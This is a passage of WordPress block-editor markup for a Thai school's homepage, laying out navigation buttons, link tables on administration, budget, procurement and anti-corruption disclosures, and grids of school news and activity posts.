{\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=337\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"